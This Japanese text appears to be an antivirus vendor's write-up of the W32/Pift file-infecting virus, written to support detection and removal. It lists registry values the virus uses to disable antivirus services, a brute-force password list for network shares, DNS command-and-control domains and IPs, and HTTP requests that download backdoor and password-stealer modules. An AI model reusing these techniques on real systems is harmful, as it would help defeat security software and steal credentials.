・実行時、ウイルスコードを最後のセクションの終わりに追加し、エントリポイントを追加したコードの先頭に向けて、システムの実行ファイルを改変します。
・また、再感染を防ぐため、マーカーをファイルのヘッダに追加します。
・また、感染ファイルが駆除された場合にウイルスを再起動するため、以下のファイルをドロップ(作成)します。
- %System32%\wmicuclt.exe
- %System32%\wmicuclt
・新たに作成されるレジストリ値の一例は以下のとおりです。
- HKLM\SYSTEM\ControlSet001\Services\360rp\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\a2AntiMalware\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\amsp\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\AntiVirService\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\avast! Antivirus\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\AVGIDSAgent\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\AVGwd\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\avp\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\ekrn\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\F-Secure Gatekeeper Handler Starter\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\FSMA\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\FSORSPClient\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\kxesapp\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\kxescore\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\mcods\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\MsMpSvc\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\Mcshield\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\NIS\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\PavFnSvr\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\pavsrv\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\RsRavMon\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\SavService\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet001\Services\V3 Service\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet002\Services\vsserv\
Start: 0x00000004
- HKLM\SYSTEM\ControlSet002\Services\zhudongfangyu\
Start: 0x00000004
・上記の値を追加することにより、どのような場合でも上記のサービスが起動しないようにします。
・また、自身のデータを格納するため、以下のキーを追加します
- HKLM\SYSTEM\Select\v
- HKLM\SYSTEM\Select\ext
- HKLM\SYSTEM\Select\plg
- HKLM\SYSTEM\Select\pu
- HKLM\SYSTEM\Select\p
・キー値vにはウイルスコードがすべて格納され、他のキーにはダウンロードしたモジュールと盗み出したパスワードが格納されます。
・また、以下のキーを追加します。
- HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\wmicucltsvc
・これにより、セーフモードでもW32/Piftが動作できるようにします。
・また、以下のプロセスに悪質なスレッドを追加します。
・これらのスレッドは、再起動後のW32/Piftの再始動を含むW32/Piftの動作全般に関与します。
・リモート共有の資格情報の総当たり攻撃のため、以下の文字列が組み込まれています。
- Admim
- Password
- User
- Server
- Testl
- Rockyou
- Letmein
- Secret
- Ilovec
- Computp
- Root
- Princess
- Dragon
- PASSWORD
- Woaini
- Wojia
- Database
- Oracle
- 123qwe
- Internetd
- Asd
- Ihavenol
- Godblesslk
- Enable
- 23abc
- 007
- Alpha
- Patrick
- Istratoyrx
- Foobar
- Temp
- Asdf
- Yxcv
- Home
- Xxx
- Owner
- Login
- Pwd
- Mypc
- Pwv
- Pussy
- 69d
- Mustang
- Ball
- Masdy
- Michaelm
- Shadow
- Monkey
- Fuckme
- Jordan
- Harley
- Ranger
- Iwantu
- Jennifer
- Hup-
- Batman
- Trustno1
- Thomas
- Tigx
- Robert
- Kill}
- P@ssW0rd
- Soft
- Assb
- 123x
・W32/PiftはDNSをコマンド&コントロールチャネルとして使用します。コマンドを受信するため、TXTレコードのドメインを照会します。ドメインのDNSコンテンツサーバは、実行するコマンドが格納された、base64でエンコードされたTXTレコードを返します。応答の一例は以下のとおりです。
- e.ppift.net text = "p666666666666666666666666666666666666666667666664kYa7kRaD4FcF!RX7MRCu9WO66666666p6666T66666CD6JaDxZXekFC8!PC9NyUD2J666666666666666666666666666666666666666666666666666"
・以下のURLおよびアドレスに接続します。命令には追加のURLが含まれており、他の悪質なファイルをダウンロードする可能性があります。
- e.ppift.in
- e.ppift.com
- e.ppift.net
- ns1.ppns.info
- ns2.ppns.info
- ns3.ppns.info
- ns4.ppns.info
- 206.137.17.89
- 199.182.233.17
- 110.45.151.19
・DNSサーバから応答を受け取ると、HTTPリクエストを実行してさらに別のファイルをマシンにダウンロードします。以下のリクエストが確認されています。
- GET /plg3.z HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0
Connection: Close
Host: d.ppns.info
- GET /ext1.z HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0
Connection: Close
Host: d.ppns.info
・上記の2つのファイルはW32/Piftによってダウンロードされました。ファイルには、ウイルス内でのみ動作するモジュールが組み込まれています。また、コードが組み込まれている可能性があります。現在ダウンロードされているモジュールはバックドアとパスワードスティーラのようです。これらは単体の実行ファイルではなく、必要なときにW32/Piftによってレジストリからロードされるコードです。
・さらに、ローカルネットワークのオープンな共有をスキャンし、リモートでファイルに感染します(ポート137)。
